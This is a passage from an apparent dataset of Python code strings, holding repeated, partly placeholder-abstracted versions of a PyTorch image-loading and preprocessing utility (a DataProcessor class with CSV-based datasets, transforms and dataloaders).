torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\ndef listdir_fullpath(d):\n return [os.path.join(d, f) for f in os.listdir(d)]\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n\n\nclass my_image_csv_dataset(Dataset):\n\n def __init__(self, data_dir, data, transforms_=None, obj=False,\n minorities=None, diffs=None, bal_tfms=None):\n self.data_dir = data_dir\n self.data = data\n self.transforms_ = transforms_\n self.tfms = None\n self.obj = obj\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n assert transforms_ is not None, print('Please pass some transforms.')\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n img_path = os.path.join(self.data_dir, self.data.iloc[index, 0])\n img = Image.open(img_path)\n img = img.convert('RGB')\n img = torchvision.transforms.functional.to_grayscale(img,\n num_output_channels=3)\n y = self.data.iloc[index, 1]\n if self.minorities and self.bal_tfms:\n if y in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[y]\n l = [self.bal_tfms]\n l.extend(self.transforms_)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[y]\n self.transforms_[1:1] = self.bal_tfms\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n else:\n self.tfms = transforms.Compose(self.transforms_)\n x = self.tfms(img)\n if self.obj:\n s = x.size()[1]\n if isinstance(s, tuple):\n s = s[0]\n row_scale = s / img.size[0]\n col_scale = s / img.size[1]\n y = rescale_bbox(y, row_scale, col_scale)\n y.squeeze_()\n y2 = self.data.iloc[index, 2]\n y = y, y2\n return x, y\n\n\nclass my_image_folder(DatasetFolder):\n\n def __init__(self, root, transform=None, target_transform=None, loader=\n default_loader, minorities=None, diffs=None, bal_tfms=None,\n tta_tfms=None):\n super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS,\n transform=transform, target_transform=target_transform)\n self.imgs = self.samples\n self.minorities = minorities\n self.diffs = diffs\n self.bal_tfms = bal_tfms\n self.tta_tfms = tta_tfms\n self.tfms = None\n\n def __getitem__(self, index):\n path, target = self.samples[index]\n sample = self.loader(path)\n if self.transform:\n if self.minorities and self.bal_tfms:\n if target in self.minorities:\n if hasattr(self.bal_tfms, 'transforms'):\n for tr in self.bal_tfms.transforms:\n tr.p = self.diffs[target]\n l = [self.bal_tfms]\n l.extend(self.transform)\n self.tfms = transforms.Compose(l)\n else:\n for t in self.bal_tfms:\n t.p = self.diffs[target]\n self.tfms = transforms.Compose(self.bal_tfms + self\n .transform)\n else:\n self.tfms = transforms.Compose(self.transform)\n elif self.tta_tfms:\n self.tfms = self.tta_tfms\n else:\n self.tfms = transforms.Compose(self.transform)\n sample = self.tfms(sample)\n if self.target_transform:\n target = self.target_transform(target)\n return sample, target\n\n\ndef extract_data(dt):\n x = []\n y = []\n for a, b in dt:\n x.append(a)\n y.append(b)\n return x, y\n\n\n<function token>\n\n\ndef get_minorities(df, thresh=0.8):\n c = df.iloc[:, 1].value_counts()\n lc = list(c)\n max_count = lc[0]\n diffs = [(1 - x / max_count) for x in lc]\n diffs = dict((k, v) for k, v in zip(c.keys(), diffs))\n minorities = [c.keys()[x] for x, y in enumerate(lc) if y < thresh *\n max_count]\n return minorities, diffs\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, 